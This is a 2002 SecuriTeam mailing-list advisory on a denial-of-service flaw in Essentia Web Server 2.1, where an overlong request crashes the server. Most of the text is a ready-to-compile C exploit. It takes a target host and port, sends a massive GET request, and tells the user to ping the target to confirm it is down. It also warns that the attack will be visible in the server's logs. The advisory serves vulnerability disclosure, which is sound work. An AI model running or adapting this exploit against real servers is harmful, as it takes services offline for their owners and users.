[NT] Essentia Web Server DoS Vulnerability

From: support@securiteam.com
Date: 02/25/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 25 Feb 2002 11:36:56 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Essentia Web Server DoS Vulnerability
------------------------------------------------------------------------

SUMMARY

The <http://www.essencomp.com/> Essentia Web Server provides Enhanced Web
Application and Communication Services. A security vulnerability in the
product allows attackers to cause the server to crash effectively causing
a denial of service attack.

DETAILS

Vulnerable systems:
Essentia Web Server version 2.1

Essentia Web Server is subject to a denial of service. Submitting a
request of unusual length to the host will cause the server to crash. A
restart is required in order to gain normal functionality.

Example:
http://host/AAAAAA...(Ax2000)...AAAAAA

Exploit code:
/*
*
* Written by redsand of securedream.net
<redsand@securedream.net
* Essentia Web Server DoS Vulnerability
* Vuln. date found: February 22. 2002
* http://essencomp.com for fix
* Vulnerable: Essentia Web Server 2.1 <maybe others>
*
* NOTE: If you want to see the webserver's response,
* define VERBOSE when compiling.
*
* WARNING: If the webserver logs, it will
* be obvious that you are attacking!
*
* DISCLAIMER: Please use this program in a
* responsible manner.
*
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

char death[]= {
  "GET
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTML/1.0\n\n\n"
};

int main(int argc, char *argv[]) {
  int sockfd, port;
  char buf[2050];
  struct hostent *ha;
  struct sockaddr_in sa;
  if (argc < 3 ) {
    printf("\n\nEssentia < 2.1 DoS\nwritten by redsand
<redsand@securedream.net>\nUsage: %s <ta
rget> <port>\n\n", argv[0]);
    exit(0);
  }
port = atoi(argv[2]);

  if (!(ha = gethostbyname (argv[1])))
    perror ("gethostbyname");

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (port);

  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
  printf("\n\nEssentia < 2.1 DoS\nwritten by redsand
<redsand@securedream.net>\n+ connecting\n
");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("+ connected\n+ sending long request to web server\n");
  send(sockfd, death, sizeof(death), 0);
  read(sockfd, buf, 2050, 0);
    close(sockfd);
  printf("+ finished\n\n\rnow check to see if host is up by
typing:\n
ping %s\n\n",argv[1]);
}

/* securedream.net */

ADDITIONAL INFORMATION

The information has been provided by <mailto:ts@securityoffice.net> Tamer
Sahin and <mailto:redsand@securedream.net> TJ Shelton.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages